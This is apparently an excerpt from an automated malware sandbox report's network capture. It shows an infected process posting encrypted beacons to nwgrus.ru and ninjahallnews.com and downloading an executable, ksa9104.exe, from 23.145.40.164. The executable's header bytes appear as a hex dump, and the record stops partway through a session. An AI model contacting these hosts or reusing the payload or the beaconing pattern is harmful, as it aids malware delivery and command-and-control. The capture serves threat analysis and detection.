                                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                                      Data Ascii: r


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      38192.168.2.450062109.175.29.39802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:22:07.699738979 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://anhllontjkcoc.org/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 277
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:22:07.699768066 CEST277OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 23 44 b4 ae
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA .[k,vu#DIGcbau'h~&g{Qp;ZV(_.ZFBs[D< #\\<` t"CNAPVo+QCJ>
                                                                                                      Oct 8, 2024 00:22:08.471247911 CEST151INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:22:08 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                                      Data Ascii: r


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      39192.168.2.450064211.171.233.129802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:22:28.580086946 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://dfdglghjacuv.net/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 170
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:22:28.580101013 CEST170OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 49 4f a0 8e
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA .[k,vuIOv:dQwa$_kww.PWe>1c(]8{*E0q^d
                                                                                                      Oct 8, 2024 00:22:30.172260046 CEST151INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:22:29 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                                      Data Ascii: r


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      40192.168.2.450066211.171.233.129802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:22:51.271368027 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://efoitwxyetuahvcx.com/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 369
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:22:51.271368027 CEST369OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2d 5f f8 83
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA .[k,vu-_Z^JIjOZ3Ybvfxi+[[_?Fqy&4s#E8CqNa|lm%MJEQ'XkTFycsY__,
                                                                                                      Oct 8, 2024 00:22:52.888025045 CEST151INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:22:52 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                                      Data Ascii: r


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      41192.168.2.450068211.171.233.129802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:23:16.756416082 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://wgvksgwflrvxis.org/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 240
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:23:16.756416082 CEST240OUTData Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 31 3e c7 fd
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA .[k,vu1>m$zAX/31XP7pM$*@faO/9qQ|&qbM:Cby``7Wik3Xa-k.9
                                                                                                      Oct 8, 2024 00:23:20.287751913 CEST151INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:23:18 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                                      Data Ascii: r


                                                                                                      HTTPS Proxied Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.44976023.145.40.1644432580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-07 22:20:17 UTC162OUTGET /ksa9104.exe HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: 23.145.40.164
                                                                                                      2024-10-07 22:20:17 UTC327INHTTP/1.1 200 OK
                                                                                                      Date: Mon, 07 Oct 2024 22:20:17 GMT
                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Last-Modified: Mon, 07 Oct 2024 22:00:03 GMT
                                                                                                      ETag: "6ec00-623ea249027e4"
                                                                                                      Accept-Ranges: bytes
                                                                                                      Content-Length: 453632
                                                                                                      Connection: close
                                                                                                      Content-Type: application/x-msdos-program
                                                                                                      2024-10-07 22:20:17 UTC7865INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7f a4 92 11 3b c5 fc 42 3b c5 fc 42 3b c5 fc 42 54 b3 62 42 23 c5 fc 42 54 b3 57 42 1c c5 fc 42 54 b3 56 42 57 c5 fc 42 32 bd 6f 42 3c c5 fc 42 3b c5 fd 42 b3 c5 fc 42 54 b3 53 42 3a c5 fc 42 54 b3 66 42 3a c5 fc 42 54 b3 61 42 3a c5 fc 42 52 69 63 68 3b c5 fc 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 cd bc 63 64 00 00 00
                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$;B;B;BTbB#BTWBBTVBWB2oB<B;BBTSB:BTfB:BTaB:BRich;BPELcd
                                                                                                      2024-10-07 22:20:17 UTC8000INData Raw: 06 88 07 8a 46 01 88 47 01 8a 46 02 88 47 02 8b 45 08 5e 5f c9 c3 90 8d 74 31 fc 8d 7c 39 fc f7 c7 03 00 00 00 75 24 c1 e9 02 83 e2 03 83 f9 08 72 0d fd f3 a5 fc ff 24 95 1c 2c 40 00 8b ff f7 d9 ff 24 8d cc 2b 40 00 8d 49 00 8b c7 ba 03 00 00 00 83 f9 04 72 0c 83 e0 03 2b c8 ff 24 85 20 2b 40 00 ff 24 8d 1c 2c 40 00 90 30 2b 40 00 54 2b 40 00 7c 2b 40 00 8a 46 03 23 d1 88 47 03 83 ee 01 c1 e9 02 83 ef 01 83 f9 08 72 b2 fd f3 a5 fc ff 24 95 1c 2c 40 00 8d 49 00 8a 46 03 23 d1 88 47 03 8a 46 02 c1 e9 02 88 47 02 83 ee 02 83 ef 02 83 f9 08 72 88 fd f3 a5 fc ff 24 95 1c 2c 40 00 90 8a 46 03 23 d1 88 47 03 8a 46 02 88 47 02 8a 46 01 c1 e9 02 88 47 01 83 ee 03 83 ef 03 83 f9 08 0f 82 56 ff ff ff fd f3 a5 fc ff 24 95 1c 2c 40 00 8d 49 00 d0 2b 40 00 d8 2b 40 00
                                                                                                      Data Ascii: FGFGE^_t1|9u$r$,@$+@Ir+$ +@$,@0+@T+@|+@F#Gr$,@IF#GFGr$,@F#GFGFGV$,@I+@+@
                                                                                                      2024-10-07 22:20:17 UTC8000INData Raw: be c0 89 85 72 ff ff ff e9 b2 00 00 00 66 8b 85 5c ff ff ff 66 83 e0 20 75 18 9b df e0 66 83 e0 20 74 0f c7 85 72 ff ff ff 08 00 00 00 e9 8d 00 00 00 d9 ad 5c ff ff ff 9b c3 66 8b 85 36 fd ff ff 66 25 f0 7f 66 0b c0 74 1b 66 3d f0 7f 74 43 eb bb 66 8b 85 36 fd ff ff 66 25 f0 7f 66 3d f0 7f 74 30 eb a8 c7 85 72 ff ff ff 04 00 00 00 dd 05 08 fd 40 00 d9 c9 d9 fd dd d9 d9 c0 d9 e1 dc 1d f8 fc 40 00 9b df e0 9e 73 34 dc 0d 18 fd 40 00 eb 2c c7 85 72 ff ff ff 03 00 00 00 dd 05 00 fd 40 00 d9 c9 d9 fd dd d9 d9 c0 d9 e1 dc 1d f0 fc 40 00 9b df e0 9e 76 06 dc 0d 10 fd 40 00 56 57 8b 9d 6c ff ff ff 43 89 9d 76 ff ff ff f6 85 38 fd ff ff 01 75 1a fc 8d 75 08 8d bd 7a ff ff ff a5 a5 80 7b 0c 01 74 08 8d 75 10 8d 7d 82 a5 a5 dd 5d 8a 8d 85 72 ff ff ff 8d 9d 5c ff ff
                                                                                                      Data Ascii: rf\f uf tr\f6f%ftf=tCf6f%f=t0r@@s4@,r@@v@VWlCv8uuz{tu}]r\
                                                                                                      2024-10-07 22:20:17 UTC8000INData Raw: 55 08 74 09 8b 4d 08 83 45 08 04 89 31 ff 07 33 ff 47 33 d2 eb 04 83 c0 02 42 66 83 38 5c 74 f6 66 83 38 22 75 38 f6 c2 01 75 1f 83 7d fc 00 74 0c 66 83 78 02 22 75 05 83 c0 02 eb 0d 33 c9 33 ff 39 4d fc 0f 94 c1 89 4d fc d1 ea eb 10 4a 85 f6 74 09 6a 5c 59 66 89 0e 83 c6 02 ff 03 85 d2 75 ec 0f b7 08 66 85 c9 74 24 39 55 fc 75 0a 83 f9 20 74 1a 83 f9 09 74 15 85 ff 74 0c 85 f6 74 06 66 89 0e 83 c6 02 ff 03 83 c0 02 eb 81 85 f6 74 08 33 c9 66 89 0e 83 c6 02 ff 03 8b 7d 0c e9 30 ff ff ff 8b 45 08 3b c2 74 02 89 10 ff 07 5f 5e c9 c3 8b ff 55 8b ec 51 51 53 56 57 68 04 01 00 00 be 98 18 45 00 56 33 c0 33 db 53 66 a3 a0 1a 45 00 ff 15 78 f0 40 00 a1 a4 cc 45 00 89 35 9c 10 45 00 3b c3 74 07 8b f8 66 39 18 75 02 8b fe 8d 45 fc 50 53 8d 5d f8 33 c9 8b c7 e8 5b
                                                                                                      Data Ascii: UtME13G3Bf8\tf8"u8u}tfx"u339MMJtj\Yfuft$9Uu ttttft3f}0E;t_^UQQSVWhEV33SfEx@E5E;tf9uEPS]3[
                                                                                                      2024-10-07 22:20:17 UTC8000INData Raw: 75 13 a1 20 bf 44 00 3d f8 ba 44 00 74 07 50 e8 d4 a8 ff ff 59 89 1d 20 bf 44 00 53 ff d7 c7 45 fc fe ff ff ff e8 02 00 00 00 eb 30 6a 0d e8 2d d3 ff ff 59 c3 eb 25 83 f8 ff 75 20 81 fb f8 ba 44 00 74 07 53 e8 9e a8 ff ff 59 e8 9c c4 ff ff c7 00 16 00 00 00 eb 04 83 65 e0 00 8b 45 e0 e8 78 cf ff ff c3 83 3d b8 cc 45 00 00 75 12 6a fd e8 56 fe ff ff 59 c7 05 b8 cc 45 00 01 00 00 00 33 c0 c3 cc cc cc cc 55 8b ec 56 33 c0 50 50 50 50 50 50 50 50 8b 55 0c 8d 49 00 8a 02 0a c0 74 09 83 c2 01 0f ab 04 24 eb f1 8b 75 08 83 c9 ff 8d 49 00 83 c1 01 8a 06 0a c0 74 09 83 c6 01 0f a3 04 24 73 ee 8b c1 83 c4 20 5e c9 c3 cc cc cc cc cc cc cc cc cc cc 8b 54 24 0c 8b 4c 24 04 85 d2 74 69 33 c0 8a 44 24 08 84 c0 75 16 81 fa 80 00 00 00 72 0e 83 3d a0 cc 45 00 00 74 05 e9
                                                                                                      Data Ascii: u D=DtPY DSE0j-Y%u DtSYeEx=EujVYE3UV3PPPPPPPPUIt$uIt$s ^T$L$ti3D$ur=Et
                                                                                                      2024-10-07 22:20:17 UTC8000INData Raw: 83 48 04 04 c7 45 10 91 00 00 c0 f6 c1 04 74 0e 8b 45 08 83 48 04 08 c7 45 10 8e 00 00 c0 f6 c1 08 74 0e 8b 45 08 83 48 04 10 c7 45 10 90 00 00 c0 8b 75 0c 8b 0e 8b 45 08 c1 e1 04 f7 d1 33 48 08 83 e1 10 31 48 08 8b 0e 8b 45 08 03 c9 f7 d1 33 48 08 83 e1 08 31 48 08 8b 0e 8b 45 08 d1 e9 f7 d1 33 48 08 83 e1 04 31 48 08 8b 0e 8b 45 08 c1 e9 03 f7 d1 33 48 08 83 e1 02 31 48 08 8b 0e 8b 45 08 c1 e9 05 f7 d1 33 48 08 23 cb 31 48 08 e8 30 04 00 00 84 c3 74 07 8b 4d 08 83 49 0c 10 a8 04 74 07 8b 4d 08 83 49 0c 08 a8 08 74 07 8b 4d 08 83 49 0c 04 a8 10 74 07 8b 4d 08 83 49 0c 02 a8 20 74 06 8b 45 08 09 58 0c 8b 06 b9 00 0c 00 00 23 c1 74 35 3d 00 04 00 00 74 22 3d 00 08 00 00 74 0c 3b c1 75 29 8b 45 08 83 08 03 eb 21 8b 45 08 8b 08 83 e1 fe 83 c9 02 89 08 eb 12
                                                                                                      Data Ascii: HEtEHEtEHEuE3H1HE3H1HE3H1HE3H1HE3H#1H0tMItMItMItMI tEX#t5=t"=t;u)E!E
                                                                                                      2024-10-07 22:20:17 UTC8000INData Raw: 1f 03 c2 8b d1 c1 f8 05 81 e2 1f 00 00 80 79 05 4a 83 ca e0 42 83 65 d8 00 83 65 e0 00 83 ce ff 8b ca d3 e6 c7 45 dc 20 00 00 00 29 55 dc f7 d6 8b 4d e0 8b 7c 8d f0 8b cf 23 ce 89 4d d4 8b ca d3 ef 8b 4d e0 0b 7d d8 89 7c 8d f0 8b 7d d4 8b 4d dc d3 e7 ff 45 e0 83 7d e0 03 89 7d d8 7c d0 8b f0 6a 02 c1 e6 02 8d 4d f8 5a 2b ce 3b d0 7c 08 8b 31 89 74 95 f0 eb 05 83 64 95 f0 00 83 e9 04 4a 79 e9 33 c0 5e 6a 1f 59 2b 0d 84 c1 44 00 d3 e3 8b 4d c8 f7 d9 1b c9 81 e1 00 00 00 80 0b d9 8b 0d 88 c1 44 00 0b 5d f0 83 f9 40 75 0d 8b 4d cc 8b 55 f4 89 59 04 89 11 eb 0a 83 f9 20 75 05 8b 4d cc 89 19 8b 4d fc 5f 33 cd 5b e8 60 78 ff ff c9 c3 8b ff 55 8b ec 83 ec 38 a1 70 b7 44 00 33 c5 89 45 fc 8b 45 08 8b 4d 0c 89 4d cc 0f b7 48 0a 53 8b d9 81 e1 00 80 00 00 89 4d c8
                                                                                                      Data Ascii: yJBeeE )UM|#MM}|}ME}}|jMZ+;|1tdJy3^jY+DMD]@uMUY uMM_3[`xU8pD3EEMMHSM
                                                                                                      2024-10-07 22:20:17 UTC8000INData Raw: 9d 04 00 4c 9d 04 00 60 9d 04 00 6e 9d 04 00 82 9d 04 00 90 9d 04 00 a2 9d 04 00 b0 9d 04 00 c8 9d 04 00 dc 9d 04 00 ec 9d 04 00 f8 9d 04 00 02 9e 04 00 16 9e 04 00 26 9e 04 00 3c 9e 04 00 4e 9e 04 00 64 9e 04 00 48 9c 04 00 8e 9e 04 00 a2 9e 04 00 b6 9e 04 00 c6 9e 04 00 dc 9e 04 00 ec 9e 04 00 06 9f 04 00 16 9f 04 00 2e 9f 04 00 40 9f 04 00 58 9f 04 00 6c 9f 04 00 82 9f 04 00 92 9f 04 00 a0 9f 04 00 b2 9f 04 00 c6 9f 04 00 d6 9f 04 00 e4 9f 04 00 f2 9f 04 00 00 a0 04 00 14 a0 04 00 28 a0 04 00 3e a0 04 00 52 a0 04 00 68 a0 04 00 76 a0 04 00 36 9c 04 00 24 9c 04 00 74 9e 04 00 10 9c 04 00 9a a4 04 00 8c a4 04 00 e6 a0 04 00 f6 a0 04 00 06 a1 04 00 0e a1 04 00 2a a1 04 00 42 a1 04 00 5a a1 04 00 72 a1 04 00 7e a1 04 00 8c a1 04 00 a0 a1 04 00 ae a1 04 00
                                                                                                      Data Ascii: L`n&<NdH.@Xl(>Rhv6$t*BZr~
                                                                                                      2024-10-07 22:20:17 UTC8000INData Raw: 64 27 00 60 6d 61 6e 61 67 65 64 20 76 65 63 74 6f 72 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 60 76 65 63 74 6f 72 20 76 62 61 73 65 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 00 60 76 65 63 74 6f 72 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 60 64 79 6e 61 6d 69 63 20 61 74 65 78 69 74 20 64 65 73 74 72 75 63 74 6f 72 20 66 6f 72 20 27 00 00 00 00 60 64 79 6e 61 6d 69 63 20 69 6e 69 74 69 61 6c 69 7a 65 72 20 66 6f 72 20 27 00 00 60 65 68 20 76 65 63 74 6f 72 20 76 62 61 73 65 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 60 65 68 20 76 65 63 74 6f 72 20 63 6f 70 79 20 63 6f 6e 73
                                                                                                      Data Ascii: d'`managed vector copy constructor iterator'`vector vbase copy constructor iterator'`vector copy constructor iterator'`dynamic atexit destructor for '`dynamic initializer for '`eh vector vbase copy constructor iterator'`eh vector copy cons
                                                                                                      2024-10-07 22:20:17 UTC8000INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                      Data Ascii:


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.44988223.145.40.1684432580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-07 22:20:42 UTC285OUTPOST /search.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: https://pdafocuyeqbl.org/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 180
                                                                                                      Host: ninjahallnews.com
                                                                                                      2024-10-07 22:20:42 UTC180OUTData Raw: 72 19 87 cc 8d 7b 1c 8a 19 f7 9b 18 4f 86 11 29 d0 84 b1 a6 66 7a 3c f3 70 71 c4 e0 ee a7 42 ed 01 9a cf f2 00 8f ae 84 85 01 d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6a 34 01 83 b6 25 93 3c 21 d2 61 e2 81 ce 53 2e c1 63 19 b7 2f 9a ef 3c 28 e7 19 3e 76 dc d8 cc 47 e2 f9 73 73 94 f5 7f ba 48 58 b9 97 71 2c 5c 60 33 1b 8c 37 d7 85 b2 49 92 bc 5d 7e 31 82 46 51 cf 53 65 e6 85 ea c8 50 2d b1 12 fe 6f 9a 0b 47 aa 52 8f 20 2e 7a 26 15 d3 e6 63 84 94 12 c2 1a 71 c6 cd b4 18 d0 a1 7d af c1 a3 99 6f
                                                                                                      Data Ascii: r{O)fz<pqB )6IP g3iqH[CLj4%<!aS.c/<(>vGssHXq,\`37I]~1FQSeP-oGR .z&cq}o
                                                                                                      2024-10-07 22:20:42 UTC294INHTTP/1.1 404 Not Found
                                                                                                      Date: Mon, 07 Oct 2024 22:20:42 GMT
                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Transfer-Encoding: chunked
                                                                                                      2024-10-07 22:20:42 UTC7898INData Raw: 31 65 65 36 0d 0a 19 00 00 00 1e 0d ae 55 88 5b ab 97 21 0d dd 60 2e 7b 1d 32 50 01 72 3e c8 9a 69 4c 1d 00 8b 6e 04 00 2a 22 f8 44 01 02 02 00 06 00 9e 03 00 00 77 51 0b 6d 97 5a 5a 1a e7 4b 51 fa 07 40 40 00 56 e8 34 2a 99 34 df c4 22 b4 0c c2 c9 75 16 28 d6 e8 35 ae 87 4e 70 79 29 cd 23 c3 ef 0b d6 49 8b 19 b9 12 52 9b dd 05 05 4e 9f 97 7b e1 5f 69 8c b0 ed 65 43 56 5e 71 f5 4e 45 39 f4 04 e9 d0 a8 e9 4b 2b 4d 76 2a 66 fa 26 fe fc 55 8f 54 eb 33 b6 46 e0 cd 9b 34 02 35 6a 8c 34 70 c2 dc 6e 38 81 9d aa f9 df b3 6b b5 26 0a bf f8 36 e7 44 24 f5 0e af a7 0a 97 ae cb ad 65 6a 38 8e 2f df 47 1f 1a ad c3 3a f2 61 39 73 b3 62 24 2c b7 bd 31 c3 2f 23 8d 51 5a f1 9f b6 71 3e fe 3f 8a 3b 55 06 26 3f 4a 6b de aa db 22 7d b3 7d c9 db a3 3d 47 8d 1a 2c 1e 6a 9c fa
                                                                                                      Data Ascii: 1ee6U[!`.{2Pr>iLn*"DwQmZZKQ@@V4*4"u(5Npy)#IRN{_ieCV^qNE9K+Mv*f&UT3F45j4pn8k&6D$ej8/G:a9sb$,1/#QZq>?;U&?Jk"}}=G,j
                                                                                                      2024-10-07 22:20:42 UTC18INData Raw: 4a ad c8 4d b8 98 51 d7 c4 46 f4 20 38 32 b7 a2 a6 9c
                                                                                                      Data Ascii: JMQF 82
                                                                                                      2024-10-07 22:20:42 UTC2INData Raw: 0d 0a
                                                                                                      Data Ascii:
                                                                                                      2024-10-07 22:20:42 UTC8192INData Raw: 32 30 30 30 0d 0a c7 83 91 ea b4 80 43 43 d2 2a 76 48 28 fa e3 f3 9b 3d 20 10 9a 0e 07 b4 7c 20 db b8 5f 0e 1c e0 7a 74 62 c2 d5 38 50 ab b4 6a a0 56 ed 37 bc 2b 04 79 0c 1b 74 82 e9 04 9a 87 8c 66 71 e2 3a 32 bf 96 aa 85 56 f4 05 fa 48 17 d7 45 b4 74 c3 01 34 c3 54 3e 0c 3d 97 2a 26 cc e0 32 29 5f 8c 55 6d 85 ae 7f c0 d1 7a 0d e9 4b ea fe ab ed 75 74 7c 00 3d e6 71 31 34 c9 ac e6 53 30 c6 87 a5 c8 d7 15 65 b7 c3 61 c3 c5 8f c6 9a c4 80 03 25 d2 d0 09 db b2 89 46 e4 46 0c 7b d6 5d 28 c6 ce 93 0e a0 df 57 0e ee 82 b4 d0 a5 1f 04 45 b4 1f 58 9b 51 6b 96 da 7d 6f 25 58 7f c2 df 99 a3 df 79 d9 ef 51 30 8c 18 69 40 64 fe e0 0e f9 89 96 8f 98 34 d7 8c c5 72 ed 1a ee 52 45 71 1c 08 d3 19 12 f4 68 db 8e ab e2 ad 2e 10 cd bb fe ff 53 78 84 90 47 f0 6e 67 90 52 5f
                                                                                                      Data Ascii: 2000CC*vH(= | _ztb8PjV7+ytfq:2VHEt4T>=*&2)_UmzKut|=q14S0ea%FF{](WEXQk}o%XyQ0i@d4rREqh.SxGngR_
                                                                                                      2024-10-07 22:20:42 UTC6INData Raw: 97 20 09 6c 1a f8
                                                                                                      Data Ascii: l
                                                                                                      2024-10-07 22:20:42 UTC2INData Raw: 0d 0a
                                                                                                      Data Ascii:
                                                                                                      2024-10-07 22:20:42 UTC8192INData Raw: 32 30 30 30 0d 0a c5 1b 8a ab 3f 66 45 20 c9 af 22 2e ab 70 95 3f 9f 17 d3 11 7d 81 a5 94 ec 3b f9 58 d1 55 e2 90 08 70 1a b8 60 26 7d 78 86 82 bc 9a 1b 61 79 3c 97 58 14 89 26 5c 44 88 a6 3d 96 1c 53 26 00 44 58 49 1b e8 f1 aa 9a db 4e 9f 66 5f 7d b0 b3 fc 57 ca ff 71 25 4f 88 ed 70 0f 16 b2 c4 bd 0e bf f3 dc 00 b7 f2 a5 f4 ae f3 f6 7a c8 37 8f 60 c1 38 d7 b6 f2 58 0d 76 ba c8 7a a6 13 3a 4c a3 b6 86 b9 a2 0c 4b 37 05 84 09 ed 08 4f 88 07 ea 9a 75 72 15 85 b8 4f 76 61 8c 31 de 65 cd 2a 97 ab 9b 29 53 ae e4 04 d8 0a b1 e7 9c e1 f6 76 b9 e7 13 2d 86 58 56 2e 7e 92 81 b1 d6 bd f7 64 fc 6f c7 85 3a 07 06 fb 78 ed f1 e2 16 f4 a8 e4 e2 30 06 ce 27 25 8a 9d db ba e3 ba 88 e2 96 64 d0 07 8e 10 df c5 fe 4c ef 98 b4 8c 08 a1 01 60 3f 7e ab c0 6c eb 06 f6 63 1f a5
                                                                                                      Data Ascii: 2000?fE ".p?};XUp`&}xay<X&\D=S&DXINf_}Wq%Opz7`8Xvz:LK7OurOva1e*)Sv-XV.~do:x0'%dL`?~lc
                                                                                                      2024-10-07 22:20:42 UTC6INData Raw: 60 4f 16 27 c7 be
                                                                                                      Data Ascii: `O'
                                                                                                      2024-10-07 22:20:42 UTC2INData Raw: 0d 0a
                                                                                                      Data Ascii:


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2192.168.2.44989023.145.40.1684432580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-07 22:20:43 UTC285OUTPOST /search.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: https://qwngamstehwl.org/
